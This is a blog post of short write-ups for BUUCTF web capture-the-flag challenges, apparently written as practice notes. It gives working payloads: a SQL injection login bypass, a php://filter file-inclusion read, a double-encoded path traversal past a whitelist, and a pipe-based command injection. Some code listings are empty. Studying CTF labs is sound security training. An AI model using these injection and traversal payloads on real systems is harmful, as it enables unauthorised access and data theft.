buuctf-web-wp
[极客大挑战2019]EasySQL
1  | admin' or 1=1#  | 
‘#’是注释符,相当于
1  | SELECT * FROM users WHERE username='admin' or 1=1 --' AND password='123'  | 
[极客大挑战2019]Havefun1
查看网页源代码,有注释
1  | <!--  | 
在url中添加get参数为cat=dog
[ACTF2020新生赛]Include
点进tips
1  | http://13ef86de-b0df-479d-81ed-82f13b3a7db8.node5.buuoj.cn:81/?file=flag.php  | 
根据file=flag.php可知,可能考察文件包含
使用php伪协议读取源码(php://filter)
1  | php://filter/convert.base64-encode/resource=目标文件  | 
即
1  | http://13ef86de-b0df-479d-81ed-82f13b3a7db8.node5.buuoj.cn:81/?file=php://filter/convert.base64-encode/resource=flag.php  | 
得到:PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7YmQzZGM3YjEtNTNjNC00NTY1LTg2MDItOGZhOTUwOGUyOGY1fQo=
进行base64解码
Base64仅包含 A-Z、a-z、0-9、+、/ 和填充符 =
得到flag
[HCTF 2018]WarmUp1 (php 代码审计)
查看网页源代码
1  | 
  | 
查看source.php
1  | http://d809957d-6301-4f3e-b94f-5b6706582f61.node5.buuoj.cn:81/source.php  | 
1  | 
  | 
需要看file中传的东西,发现函数中定义了两个白名单,查看hint.php
‘’flag not here, and flag in ffffllllaaaagggg’’
在source.php中,如果 $page 包含 ?,则截取 ? 之前的部分,检查是否在白名单内
则两次编码?,得到%253F
经过不断的退目录尝试
1  | http://d809957d-6301-4f3e-b94f-5b6706582f61.node5.buuoj.cn:81/?file=source.php%253F../../../../../ffffllllaaaagggg  | 
得到flag
[ACTF2020 新生赛]Exec1
1  | 127.0.0.1|ls /  | 
得到flag
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 QingMaxLim-Blog!








